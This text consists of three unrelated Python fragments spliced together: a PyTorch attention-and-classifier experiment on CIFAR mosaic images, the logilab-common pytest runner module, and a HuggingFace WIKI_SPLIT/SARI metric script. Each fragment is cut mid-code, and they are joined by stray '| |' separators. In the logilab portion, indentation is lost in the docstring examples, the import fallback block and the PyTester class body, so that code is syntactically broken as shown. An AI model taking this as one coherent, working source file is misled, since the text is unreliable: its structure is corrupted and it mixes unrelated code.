# x = self.pool(x)
# x = self.conv3(x)
# x = F.relu(self.batch_norm2(x))
# x = (F.relu(self.conv4(x)))
# x = self.pool(x)
# x = self.dropout1(x)
# x = self.conv5(x)
# x = F.relu(self.batch_norm2(x))
# x = self.conv6(x)
# x1 = F.tanh(x)
# x = F.relu(x)
# x = self.pool(x)
# x = x.view(x.size(0), -1)
# x = self.dropout2(x)
# x = F.relu(self.fc1(x))
# x = F.relu(self.fc2(x))
# x = self.dropout2(x)
# x = F.relu(self.fc3(x))
# x = self.fc4(x)
# return x,x1
class Focus(nn.Module):
    """Attention ("focus") network: scores each of the 9 tiles of a mosaic
    and returns softmax attention weights plus the attention-weighted
    average of the per-tile feature maps.

    NOTE(review): forward() depends on the module-level ``batch`` constant
    and on a CUDA device being available -- the pre-allocated buffers below
    are sized and placed accordingly; confirm before reusing elsewhere.
    """
    def __init__(self, pretrained=True):
        super(Focus, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=0)
        self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=0)
        self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=0)
        self.conv4 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=0)
        self.conv5 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=0)
        self.conv6 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2)
        self.batch_norm1 = nn.BatchNorm2d(32)
        self.batch_norm2 = nn.BatchNorm2d(128)
        self.dropout1 = nn.Dropout2d(p=0.05)
        self.dropout2 = nn.Dropout2d(p=0.1)
        self.fc1 = nn.Linear(128, 64)
        self.fc2 = nn.Linear(64, 32)
        self.fc3 = nn.Linear(32, 10)
        self.fc4 = nn.Linear(10, 2)
        # When True, helper() scores a tile with the difference of the two
        # fc4 logits; when False it uses the raw first logit only.
        self.pretrained = pretrained

    def forward(self, z):  # z: batch of lists of 9 tile images
        """Return (attention weights, averaged feature map) for a mosaic batch."""
        # Pre-allocated accumulators; helper() emits 128x3x3 feature maps.
        y = torch.zeros([batch, 128, 3, 3], dtype=torch.float64)
        x = torch.zeros([batch, 9], dtype=torch.float64)
        ftr = torch.zeros([batch, 9, 128, 3, 3])
        y = y.to("cuda")
        x = x.to("cuda")
        ftr = ftr.to("cuda")
        for i in range(9):
            # Score tile i and keep its (tanh) feature map for averaging.
            out, ftrs = self.helper(z[:, i])
            x[:, i] = out
            ftr[:, i] = ftrs
        # Normalise the 9 tile scores into attention weights.
        x = F.softmax(x, dim=1)
        for i in range(9):
            x1 = x[:, i]
            # Attention-weighted sum over tiles (broadcast weight over CHW).
            y = y + torch.mul(x1[:, None, None, None], ftr[:, i])
        return x, y  # alpha weights, averaged feature map

    def helper(self, x):
        """Score one tile; returns (per-sample scalar score, tanh feature map)."""
        x = self.conv1(x)
        x = F.relu(self.batch_norm1(x))
        x = (F.relu(self.conv2(x)))
        x = self.pool(x)
        x = self.conv3(x)
        x = F.relu(self.batch_norm2(x))
        x = (F.relu(self.conv4(x)))
        x = self.pool(x)
        x = self.dropout1(x)
        x = self.conv5(x)
        x = F.relu(self.batch_norm2(x))
        x = self.conv6(x)
        # Keep the pre-ReLU activations (tanh-squashed) as the tile features.
        x1 = F.tanh(x)
        x = F.relu(x)
        x = self.pool(x)
        x = x.view(x.size(0), -1)
        x = self.dropout2(x)
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = self.dropout2(x)
        x = F.relu(self.fc3(x))
        if self.pretrained == True:
            x = self.fc4(x)
            # Two-logit head collapsed to a single margin score.
            x = x[:, 1] - x[:, 0]
        else:
            x = self.fc4(x)
            x = x[:, 0]
        return x, x1
# Instantiate the focus network in float64 and move it to the GPU.
# (A commented-out experiment that loaded pre-trained focus weights and
# collapsed fc4 to a single output was removed here.)
focus_net = Focus().double()
focus_net = focus_net.to("cuda")
"""Changing the last layer of Focus net"""
# Freeze every Focus parameter: in this run only the classifier is trained.
for params in focus_net.parameters():
    params.requires_grad = False
class Classification(nn.Module):
    """CNN head that classifies a feature map into one of 3 classes.

    In this pipeline ``conv1`` is later swapped for a 128-channel input
    layer so the network can consume the (batch, 128, 3, 3) attention
    averages produced by the Focus net.
    """
    def __init__(self):
        super(Classification, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1)
        self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1)
        self.conv4 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
        self.conv5 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
        self.conv6 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1)
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=1)
        self.batch_norm1 = nn.BatchNorm2d(32)
        self.batch_norm2 = nn.BatchNorm2d(128)
        self.dropout1 = nn.Dropout2d(p=0.05)
        self.dropout2 = nn.Dropout2d(p=0.1)
        self.global_average_pooling = nn.AvgPool2d(kernel_size=2)
        self.fc1 = nn.Linear(128, 64)
        self.fc2 = nn.Linear(64, 32)
        self.fc3 = nn.Linear(32, 10)
        self.fc4 = nn.Linear(10, 3)

    def forward(self, x):
        """Return (N, 3) class logits for a batch of input feature maps."""
        x = self.conv1(x)
        x = F.relu(self.batch_norm1(x))
        x = (F.relu(self.conv2(x)))
        x = self.pool(x)
        x = self.conv3(x)
        x = F.relu(self.batch_norm2(x))
        x = (F.relu(self.conv4(x)))
        x = self.pool(x)
        x = self.dropout1(x)
        x = self.conv5(x)
        x = F.relu(self.batch_norm2(x))
        x = (F.relu(self.conv6(x)))
        x = self.pool(x)
        x = self.global_average_pooling(x)
        # BUGFIX: the original `x.squeeze()` removed ALL size-1 dims, so a
        # batch of one produced a 1-D (3,) output instead of (1, 3) and
        # broke downstream argmax/loss code; view() keeps the batch axis.
        x = x.view(x.size(0), -1)
        x = self.dropout2(x)
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = self.dropout2(x)
        x = F.relu(self.fc3(x))
        x = self.fc4(x)
        return x
# Classifier in float64 on the GPU, warm-started from saved weights.
classify = Classification().double()
classify = classify.to("cuda")
classify.load_state_dict( torch.load("/content/classify_weights.pt"))
# Replace the RGB input layer with a 128-channel one so the net accepts the
# (batch, 128, 3, 3) averaged feature maps from Focus.  The new conv1 is
# randomly initialised (its loaded weights are discarded by the swap).
classify.conv1 = nn.Conv2d(in_channels=128, out_channels=32, kernel_size=3, padding=1)
classify = classify.double()
classify = classify.to("cuda")
# Unlike the frozen Focus net, the classifier remains trainable.
for params in classify.parameters():
    params.requires_grad = True
test_images = []  # list of mosaic images, each saved as a list of 9 tiles
fore_idx_test = []  # position of the foreground tile within each test mosaic
test_label = []  # label of mosaic image = foreground class present in that mosaic
# Seeds 30000-39999 keep the test mosaics disjoint from training seeds 0-29999
# (note: the underlying CIFAR pools are shared with the training mosaics).
for i in range(10000):
    np.random.seed(i + 30000)
    bg_idx = np.random.randint(0, 35000, 8)
    fg_idx = np.random.randint(0, 15000)
    fg = np.random.randint(0, 9)
    fore_idx_test.append(fg)
    image_list, label = create_mosaic_img(bg_idx, fg_idx, fg)
    test_images.append(image_list)
    test_label.append(label)
test_data = MosaicDataset(test_images, test_label, fore_idx_test)
test_loader = DataLoader(test_data, batch_size=batch, shuffle=False)
import torch.optim as optim

criterion_classify = nn.CrossEntropyLoss()
# An optimizer is also built for focus_net, although its parameters were
# frozen above, so only optimizer_classify has any effect.
optimizer_focus = optim.SGD(focus_net.parameters(), lr=0.01, momentum=0.9)
optimizer_classify = optim.SGD(classify.parameters(), lr=0.01, momentum=0.9)
# Per-epoch bookkeeping columns (epoch number, argmax>=0.5 counts, and the
# FTPT/FFPT/FTPF/FFPF focus-vs-prediction buckets, later assembled into a
# results table).
col1 = []
col2 = []
col3 = []
col4 = []
col5 = []
col6 = []
col7 = []
col8 = []
col9 = []
col10 = []
col11 = []
col12 = []
col13 = []
# Running counters for the pre-training evaluation pass below.
correct = 0
total = 0
count = 0
flag = 1
focus_true_pred_true = 0
focus_false_pred_true = 0
focus_true_pred_false = 0
focus_false_pred_false = 0
argmax_more_than_half = 0
argmax_less_than_half = 0
# Pre-training evaluation over the training mosaics: measure accuracy and
# bucket every sample by (focused on the right tile?) x (classified right?).
with torch.no_grad():
    for data in train_loader:
        inputs, labels, fore_idx = data
        inputs = inputs.double()
        inputs, labels, fore_idx = inputs.to("cuda"), labels.to("cuda"), fore_idx.to("cuda")
        alphas, avg_images = focus_net(inputs)
        outputs = classify(avg_images)
        _, predicted = torch.max(outputs.data, 1)
        for j in range(labels.size(0)):
            count += 1
            # Tile the focus net attends to most strongly.
            focus = torch.argmax(alphas[j])
            if alphas[j][focus] >= 0.5:
                argmax_more_than_half += 1
            else:
                argmax_less_than_half += 1
            # FTPT / FFPT / FTPF / FFPF buckets.
            if (focus == fore_idx[j] and predicted[j] == labels[j]):
                focus_true_pred_true += 1
            elif (focus != fore_idx[j] and predicted[j] == labels[j]):
                focus_false_pred_true += 1
            elif (focus == fore_idx[j] and predicted[j] != labels[j]):
                focus_true_pred_false += 1
            elif (focus != fore_idx[j] and predicted[j] != labels[j]):
                focus_false_pred_false += 1
        total += labels.size(0)
        correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 30000 train images: %d %%' % ( 100 * correct / total))
print("total correct", correct)
print("total train set images", total)
print("focus_true_pred_true %d =============> FTPT : %d %%" % (focus_true_pred_true , (100 * focus_true_pred_true / total) ) )
print("focus_false_pred_true %d =============> FFPT : %d %%" % (focus_false_pred_true, (100 * focus_false_pred_true / total) ) )
print("focus_true_pred_false %d =============> FTPF : %d %%" %( focus_true_pred_false , ( 100 * focus_true_pred_false / total) ) )
print("focus_false_pred_false %d =============> FFPF : %d %%" % (focus_false_pred_false, ( 100 * focus_false_pred_false / total) ) )
print("argmax_more_than_half ==================> ",argmax_more_than_half)
print("argmax_less_than_half ==================> ",argmax_less_than_half)
print(count)
print("="*100)
# Record the epoch-0 (pre-training) statistics.
col1.append(0)
col2.append(argmax_more_than_half)
col3.append(argmax_less_than_half)
col4.append(focus_true_pred_true)
col5.append(focus_false_pred_true)
col6.append(focus_true_pred_false)
col7.append(focus_false_pred_false)
correct = 0
total = 0
count = 0
flag = 1
focus_true_pred_true =0
focus_false_pred_true =0
focus_true_pred_false | |
# logilab/common/pytest.py (from logilab-common, bundled with SourceMeter)
# copyright 2003-2011 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:<EMAIL>
#
# This file is part of logilab-common.
#
# logilab-common is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 2.1 of the License, or (at your option) any
# later version.
#
# logilab-common is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-common. If not, see <http://www.gnu.org/licenses/>.
"""pytest is a tool that eases test running and debugging.
To be able to use pytest, you should either write tests using
the logilab.common.testlib's framework or the unittest module of the
Python's standard library.
You can customize pytest's behaviour by defining a ``pytestconf.py`` file
somewhere in your test directory. In this file, you can add options or
change the way tests are run.
To add command line options, you must define a ``update_parser`` function in
your ``pytestconf.py`` file. The function must accept a single parameter
that will be the OptionParser's instance to customize.
If you wish to customize the tester, you'll have to define a class named
``CustomPyTester``. This class should extend the default `PyTester` class
defined in the pytest module. Take a look at the `PyTester` and `DjangoTester`
classes for more information about what can be done.
For instance, if you wish to add a custom -l option to specify a loglevel, you
could define the following ``pytestconf.py`` file ::
import logging
from logilab.common.pytest import PyTester
def update_parser(parser):
parser.add_option('-l', '--loglevel', dest='loglevel', action='store',
choices=('debug', 'info', 'warning', 'error', 'critical'),
default='critical', help="the default log level possible choices are "
"('debug', 'info', 'warning', 'error', 'critical')")
return parser
class CustomPyTester(PyTester):
def __init__(self, cvg, options):
super(CustomPyTester, self).__init__(cvg, options)
loglevel = options.loglevel.upper()
logger = logging.getLogger('erudi')
logger.setLevel(logging.getLevelName(loglevel))
In your TestCase class you can then get the value of a specific option with
the ``optval`` method::
class MyTestCase(TestCase):
def test_foo(self):
loglevel = self.optval('loglevel')
# ...
You can also tag your tests for fine filtering
With those tag::
from logilab.common.testlib import tag, TestCase
class Exemple(TestCase):
@tag('rouge', 'carre')
def toto(self):
pass
@tag('carre', 'vert')
def tata(self):
pass
@tag('rouge')
def titi(test):
pass
you can filter the function with a simple python expression
* ``toto`` and ``titi`` match ``rouge``
* ``toto``, ``tata`` and ``titi``, match ``rouge or carre``
* ``tata`` and ``titi`` match ``rouge ^ carre``
* ``titi`` match ``rouge and not carre``
"""
from __future__ import print_function
__docformat__ = "restructuredtext en"
PYTEST_DOC = """%prog [OPTIONS] [testfile [testpattern]]
examples:
pytest path/to/mytests.py
pytest path/to/mytests.py TheseTests
pytest path/to/mytests.py TheseTests.test_thisone
pytest path/to/mytests.py -m '(not long and database) or regr'
pytest one (will run both test_thisone and test_thatone)
pytest path/to/mytests.py -s not (will skip test_notthisone)
"""
# Design-by-contract support toggle (off by default).
ENABLE_DBC = False
# State file recording failed tests so a later run can restart from them.
FILE_RESTART = ".pytest.restart"
import os, sys, re
import os.path as osp
from time import time, clock
import warnings
import types
from inspect import isgeneratorfunction, isclass
from contextlib import contextmanager
from logilab.common.fileutils import abspath_listdir
from logilab.common import textutils
from logilab.common import testlib, STD_BLACKLIST
# use the same unittest module as testlib
from logilab.common.testlib import unittest, start_interactive_mode
from logilab.common.deprecation import deprecated
import doctest
import unittest as unittest_legacy
if not getattr(unittest_legacy, "__package__", None):
try:
import unittest2.suite as unittest_suite
except ImportError:
sys.exit("You have to install python-unittest2 to use this module")
else:
import unittest.suite as unittest_suite
try:
import django
from logilab.common.modutils import modpath_from_file, load_module_from_modpath
DJANGO_FOUND = True
except ImportError:
DJANGO_FOUND = False
CONF_FILE = 'pytestconf.py'
## coverage pausing tools
@contextmanager
def replace_trace(trace=None):
    """Temporarily install *trace* as the global trace function.

    On exit, the trace function that was active on entry is restored.
    """
    previous = sys.gettrace()
    sys.settrace(trace)
    try:
        yield
    finally:
        # specific hack to work around a bug in pycoverage, see
        # https://bitbucket.org/ned/coveragepy/issue/123
        broken_coverage_tracer = (previous is not None
                                  and not callable(previous)
                                  and hasattr(previous, 'pytrace'))
        if broken_coverage_tracer:
            previous = previous.pytrace
        sys.settrace(previous)
def pause_trace():
    """Return a context manager that suspends any tracing while active."""
    # Installing a ``None`` trace function disables tracing entirely.
    return replace_trace(None)
class TraceController(object):
    """Deprecated class-level facade over :func:`pause_trace`.

    Kept for backward compatibility only; new code should use the
    ``pause_trace()`` context manager directly.
    """
    # Stack of currently-entered pause_trace() context managers (LIFO).
    ctx_stack = []

    @classmethod
    @deprecated('[lgc 0.63.1] Use the pause_trace() context manager')
    def pause_tracing(cls):
        # Enter a new pause context and remember it for resume_tracing().
        cls.ctx_stack.append(pause_trace())
        cls.ctx_stack[-1].__enter__()

    @classmethod
    @deprecated('[lgc 0.63.1] Use the pause_trace() context manager')
    def resume_tracing(cls):
        # Exit the most recently entered pause context.
        cls.ctx_stack.pop().__exit__(None, None, None)

# Module-level aliases kept for backward compatibility.
pause_tracing = TraceController.pause_tracing
resume_tracing = TraceController.resume_tracing
def nocoverage(func):
    """Function decorator that pauses tracing functions while *func* runs.

    Idempotent: a function already wrapped (flagged via its ``uncovered``
    attribute) is returned unchanged.
    """
    from functools import wraps  # local import: keeps module deps untouched

    if hasattr(func, 'uncovered'):
        return func
    func.uncovered = True

    @wraps(func)  # preserve __name__/__doc__ for test reporting tools
    def not_covered(*args, **kwargs):
        with pause_trace():
            return func(*args, **kwargs)
    not_covered.uncovered = True
    return not_covered
## end of coverage pausing tools
# Raw string avoids the invalid "\." escape warning (W605) in non-raw literals.
TESTFILE_RE = re.compile(r"^((unit)?test.*|smoketest)\.py$")
def this_is_a_testfile(filename):
    """returns True if `filename` seems to be a test file"""
    return TESTFILE_RE.match(osp.basename(filename))
# Raw string for consistency with TESTFILE_RE (no escapes needed here).
TESTDIR_RE = re.compile(r"^(unit)?tests?$")
def this_is_a_testdir(dirpath):
    """returns True if `dirpath` seems to be a test directory"""
    return TESTDIR_RE.match(osp.basename(dirpath))
def load_pytest_conf(path, parser):
    """loads a ``pytestconf.py`` file and update default parser
    and / or tester.

    :param path: path of the ``pytestconf.py`` file to execute.
    :param parser: option parser passed to any ``update_parser`` hook.
    :return: the ``CustomPyTester`` class defined by the conf file, or the
        default :class:`PyTester`.
    """
    namespace = {}
    # Close the file deterministically instead of leaking the handle
    # until garbage collection.
    with open(path, 'rb') as conf_file:
        exec(conf_file.read(), namespace)
    if 'update_parser' in namespace:
        namespace['update_parser'](parser)
    return namespace.get('CustomPyTester', PyTester)
def project_root(parser, projdir=None):
    """try to find project's root and add it to sys.path

    :param parser: option parser handed to any ``pytestconf.py`` found.
    :param projdir: directory to start from; defaults to the current
        working directory *at call time*.  The old ``projdir=os.getcwd()``
        default was evaluated once at import time, silently pinning
        whatever directory the module happened to be imported from.
    :return: a ``(root directory, tester class)`` tuple.
    """
    if projdir is None:
        projdir = os.getcwd()
    previousdir = curdir = osp.abspath(projdir)
    testercls = PyTester
    conf_file_path = osp.join(curdir, CONF_FILE)
    if osp.isfile(conf_file_path):
        testercls = load_pytest_conf(conf_file_path, parser)
    # Walk upwards while we are inside a test dir or a package.
    while this_is_a_testdir(curdir) or \
            osp.isfile(osp.join(curdir, '__init__.py')):
        newdir = osp.normpath(osp.join(curdir, os.pardir))
        if newdir == curdir:
            break
        previousdir = curdir
        curdir = newdir
        conf_file_path = osp.join(curdir, CONF_FILE)
        if osp.isfile(conf_file_path):
            testercls = load_pytest_conf(conf_file_path, parser)
    return previousdir, testercls
class GlobalTestReport(object):
    """Accumulates test statistics across every module of a pytest run."""

    def __init__(self):
        self.ran = 0           # total number of test cases executed
        self.skipped = 0       # total skipped test cases
        self.failures = 0      # total assertion failures
        self.errors = 0        # total unexpected errors
        self.ttime = 0         # cumulated wall-clock time
        self.ctime = 0         # cumulated CPU time
        self.modulescount = 0  # number of test modules processed
        self.errmodules = []   # (module name, problem count, run count)

    def feed(self, filename, testresult, ttime, ctime):
        """integrates new test information into internal statistics"""
        executed = testresult.testsRun
        nb_failures = len(testresult.failures)
        nb_errors = len(testresult.errors)
        self.ran += executed
        self.skipped += len(getattr(testresult, 'skipped', ()))
        self.failures += nb_failures
        self.errors += nb_errors
        self.ttime += ttime
        self.ctime += ctime
        self.modulescount += 1
        if not testresult.wasSuccessful():
            # strip the trailing ".py" from the module file name
            self.errmodules.append((filename[:-3],
                                    nb_failures + nb_errors,
                                    executed))

    def failed_to_test_module(self, filename):
        """called when the test module could not be imported by unittest
        """
        self.errors += 1
        self.modulescount += 1
        self.ran += 1
        self.errmodules.append((filename[:-3], 1, 1))

    def skip_module(self, filename):
        # count the module as processed but report no problems for it
        self.modulescount += 1
        self.ran += 1
        self.errmodules.append((filename[:-3], 0, 0))

    def __str__(self):
        """render the collected statistics as a short multi-line summary"""
        parts = ['Ran %s test cases in %.2fs (%.2fs CPU)'
                 % (self.ran, self.ttime, self.ctime)]
        for counter, noun in ((self.errors, 'errors'),
                              (self.failures, 'failures'),
                              (self.skipped, 'skipped')):
            if counter:
                parts.append('%s %s' % (counter, noun))
        modulesok = self.modulescount - len(self.errmodules)
        if self.errors or self.failures:
            line2 = '%s modules OK (%s failed)' % (modulesok,
                                                   len(self.errmodules))
            descr = ', '.join(['%s [%s/%s]' % info for info in self.errmodules])
            line3 = '\nfailures: %s' % descr
        elif modulesok:
            line2 = 'All %s modules OK' % modulesok
            line3 = ''
        else:
            return ''
        return '%s\n%s%s' % (', '.join(parts), line2, line3)
def remove_local_modules_from_sys(testdir):
    """remove all modules from cache that come from `testdir`

    This is used to avoid strange side-effects when using the
    testall() mode of pytest.
    For instance, if we run pytest on this tree::

        A/test/test_utils.py
        B/test/test_utils.py

    we **have** to clean sys.modules to make sure the correct test_utils
    module is ran in B

    BUG FIX: namespace packages can expose ``__file__ = None``, which made
    ``osp.isabs(None)`` raise TypeError; such modules are now skipped.
    """
    for modname, mod in list(sys.modules.items()):
        if mod is None:
            continue
        # this is the case of some built-in modules like sys, imp, marshal
        modfile = getattr(mod, '__file__', None)
        # no usable path (builtin or namespace package): cannot come from testdir
        if not modfile:
            continue
        # if modfile is not an absolute path, it was probably loaded locally
        # during the tests
        if not osp.isabs(modfile) or modfile.startswith(testdir):
            del sys.modules[modname]
class PyTester(object):
"""encapsulates testrun logic"""
def __init__(self, cvg, options):
    """`cvg`: coverage recorder threaded through test runs (presumably may be
    None -- TODO confirm against callers); `options`: parsed CLI options."""
    self.report = GlobalTestReport()
    self.cvg = cvg
    self.options = options
    # True until the first output is written (used by reporting elsewhere --
    # NOTE(review): usage not visible in this chunk)
    self.firstwrite = True
    # explicit exit-code override; None means "derive from report"
    self._errcode = None
def show_report(self):
    """prints the report banner; the exit code is exposed separately via
    the `errcode` property (this method returns None)"""
    # everything has been ran, print report
    print("*" * 79)
    print(self.report)
def get_errcode(self):
    """Exit code: the explicit override when one was set, otherwise the
    total number of failures plus errors."""
    explicit = self._errcode
    if explicit is not None:
        return explicit
    return self.report.failures + self.report.errors

def set_errcode(self, errcode):
    """Force the exit code returned by `get_errcode`."""
    self._errcode = errcode

errcode = property(get_errcode, set_errcode)
def testall(self, exitfirst=False):
"""walks through current working directory, finds something
which can be considered as a testdir and runs every test there
"""
here = os.getcwd()
for dirname, dirs, _ in os.walk(here):
for skipped in STD_BLACKLIST:
if skipped in dirs:
dirs.remove(skipped)
basename = osp.basename(dirname)
if this_is_a_testdir(basename):
print("going into", dirname)
# we found a testdir, let's explore it !
if not self.testonedir(dirname, exitfirst):
break
dirs[:] = []
if self.report.ran == 0:
print("no test dir found testing here:", here)
# if no test was found during the visit, consider
# the local directory as a test directory even if
# | |
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" WIKI_SPLIT metric."""
import re
import string
from collections import Counter
import sacrebleu
import sacremoses
from packaging import version
import datasets
# BibTeX entries for the SARI (Xu et al., 2016) and SacreBLEU (Post, 2018)
# papers.  NOTE(review): author names were scrubbed to "<NAME>" placeholders
# upstream and the first entry's closing brace is missing -- kept verbatim
# because this string is runtime metadata consumed by `datasets`.
_CITATION = """
@inproceedings{xu-etal-2016-optimizing,
title = {Optimizing Statistical Machine Translation for Text Simplification},
authors={<NAME> <NAME> <NAME> <NAME> Callison-Burch, Chris},
journal = {Transactions of the Association for Computational Linguistics},
volume = {4},
year={2016},
url = {https://www.aclweb.org/anthology/Q16-1029},
pages = {401--415
},
@inproceedings{post-2018-call,
title = "A Call for Clarity in Reporting {BLEU} Scores",
author = "<NAME>",
booktitle = "Proceedings of the Third Conference on Machine Translation: Research Papers",
month = oct,
year = "2018",
address = "Belgium, Brussels",
publisher = "Association for Computational Linguistics",
url = "https://www.aclweb.org/anthology/W18-6319",
pages = "186--191",
}
"""
# One-paragraph metric description shown by `datasets`.
_DESCRIPTION = """\
WIKI_SPLIT is the combination of three metrics SARI, EXACT and SACREBLEU
It can be used to evaluate the quality of machine-generated texts.
"""
# Usage string (args/returns/doctest) shown by `datasets.load_metric`.
_KWARGS_DESCRIPTION = """
Calculates sari score (between 0 and 100) given a list of source and predicted
sentences, and a list of lists of reference sentences. It also computes the BLEU score as well as the exact match score.
Args:
sources: list of source sentences where each sentence should be a string.
predictions: list of predicted sentences where each sentence should be a string.
references: list of lists of reference sentences where each sentence should be a string.
Returns:
sari: sari score
sacrebleu: sacrebleu score
exact: exact score
Examples:
>>> sources=["About 95 species are currently accepted ."]
>>> predictions=["About 95 you now get in ."]
>>> references=[["About 95 species are currently known ."]]
>>> wiki_split = datasets.load_metric("wiki_split")
>>> results = wiki_split.compute(sources=sources, predictions=predictions, references=references)
>>> print(results)
{'sari': 21.805555555555557, 'sacrebleu': 14.535768424205482, 'exact': 0.0}
"""
def normalize_answer(s):
    """Lower text and remove punctuation, articles and extra whitespace."""

    def _strip_punct(text):
        # drop every ASCII punctuation character
        return text.translate(str.maketrans("", "", string.punctuation))

    def _strip_articles(text):
        return re.sub(r"\b(a|an|the)\b", " ", text, flags=re.UNICODE)

    collapsed = _strip_articles(_strip_punct(s.lower()))
    # collapse runs of whitespace into single spaces
    return " ".join(collapsed.split())


def compute_exact(a_gold, a_pred):
    """1 when gold and prediction coincide after normalization, else 0."""
    return 1 if normalize_answer(a_gold) == normalize_answer(a_pred) else 0


def compute_em(predictions, references):
    """Percentage of predictions exactly matching at least one reference."""
    per_item = [
        any(compute_exact(ref, pred) for ref in refs)
        for pred, refs in zip(predictions, references)
    ]
    return (sum(per_item) / len(per_item)) * 100
def SARIngram(sgrams, cgrams, rgramslist, numref):
    """Compute the SARI keep/delete/add component scores for one n-gram order.

    Args:
        sgrams: n-grams of the source sentence.
        cgrams: n-grams of the candidate (predicted) sentence.
        rgramslist: one list of n-grams per reference sentence.
        numref: number of references; source/candidate counts are scaled by
            this so they are comparable with the pooled reference counts.

    Returns:
        (keepscore, delscore_precision, addscore) -- floats in [0, 1].
    """
    # pool all reference n-grams into a single multiset
    rgramsall = [rgram for rgrams in rgramslist for rgram in rgrams]
    rgramcounter = Counter(rgramsall)
    sgramcounter = Counter(sgrams)
    # source counts scaled by numref to match the pooled-reference scale
    sgramcounter_rep = Counter()
    for sgram, scount in sgramcounter.items():
        sgramcounter_rep[sgram] = scount * numref
    cgramcounter = Counter(cgrams)
    # candidate counts scaled the same way
    cgramcounter_rep = Counter()
    for cgram, ccount in cgramcounter.items():
        cgramcounter_rep[cgram] = ccount * numref
    # KEEP: n-grams present in both source and candidate (& = multiset min)
    keepgramcounter_rep = sgramcounter_rep & cgramcounter_rep
    keepgramcountergood_rep = keepgramcounter_rep & rgramcounter
    keepgramcounterall_rep = sgramcounter_rep & rgramcounter
    keeptmpscore1 = 0
    keeptmpscore2 = 0
    for keepgram in keepgramcountergood_rep:
        keeptmpscore1 += keepgramcountergood_rep[keepgram] / keepgramcounter_rep[keepgram]
        # Fix an alleged bug [2] in the keep score computation.
        # keeptmpscore2 += keepgramcountergood_rep[keepgram] / keepgramcounterall_rep[keepgram]
        keeptmpscore2 += keepgramcountergood_rep[keepgram]
    # Define 0/0=1 instead of 0 to give higher scores for predictions that match
    # a target exactly.
    keepscore_precision = 1
    keepscore_recall = 1
    if len(keepgramcounter_rep) > 0:
        keepscore_precision = keeptmpscore1 / len(keepgramcounter_rep)
    if len(keepgramcounterall_rep) > 0:
        # Fix an alleged bug [2] in the keep score computation.
        # keepscore_recall = keeptmpscore2 / len(keepgramcounterall_rep)
        keepscore_recall = keeptmpscore2 / sum(keepgramcounterall_rep.values())
    # harmonic mean (F1) of keep precision and recall
    keepscore = 0
    if keepscore_precision > 0 or keepscore_recall > 0:
        keepscore = 2 * keepscore_precision * keepscore_recall / (keepscore_precision + keepscore_recall)
    # DELETION: n-grams in the source that the candidate dropped (- = multiset
    # difference); only precision is used for the deletion component
    delgramcounter_rep = sgramcounter_rep - cgramcounter_rep
    delgramcountergood_rep = delgramcounter_rep - rgramcounter
    delgramcounterall_rep = sgramcounter_rep - rgramcounter
    deltmpscore1 = 0
    deltmpscore2 = 0
    for delgram in delgramcountergood_rep:
        deltmpscore1 += delgramcountergood_rep[delgram] / delgramcounter_rep[delgram]
        deltmpscore2 += delgramcountergood_rep[delgram] / delgramcounterall_rep[delgram]
    # Define 0/0=1 instead of 0 to give higher scores for predictions that match
    # a target exactly.
    delscore_precision = 1
    if len(delgramcounter_rep) > 0:
        delscore_precision = deltmpscore1 / len(delgramcounter_rep)
    # ADDITION: new n-grams introduced by the candidate (set-based, not counts)
    addgramcounter = set(cgramcounter) - set(sgramcounter)
    addgramcountergood = set(addgramcounter) & set(rgramcounter)
    addgramcounterall = set(rgramcounter) - set(sgramcounter)
    addtmpscore = 0
    for addgram in addgramcountergood:
        addtmpscore += 1
    # Define 0/0=1 instead of 0 to give higher scores for predictions that match
    # a target exactly.
    addscore_precision = 1
    addscore_recall = 1
    if len(addgramcounter) > 0:
        addscore_precision = addtmpscore / len(addgramcounter)
    if len(addgramcounterall) > 0:
        addscore_recall = addtmpscore / len(addgramcounterall)
    # harmonic mean (F1) of add precision and recall
    addscore = 0
    if addscore_precision > 0 or addscore_recall > 0:
        addscore = 2 * addscore_precision * addscore_recall / (addscore_precision + addscore_recall)
    return (keepscore, delscore_precision, addscore)
def _ngrams(tokens, n):
    """Space-joined `n`-grams of `tokens`, in order (empty when len < n)."""
    return [" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]


def SARIsent(ssent, csent, rsents):
    """Sentence-level SARI: average of keep/delete/add scores over 1..4-grams.

    Args:
        ssent: source sentence (tokens separated by single spaces).
        csent: candidate (predicted) sentence.
        rsents: list of reference sentences.

    Returns:
        float SARI score in [0, 1] (callers typically scale by 100).

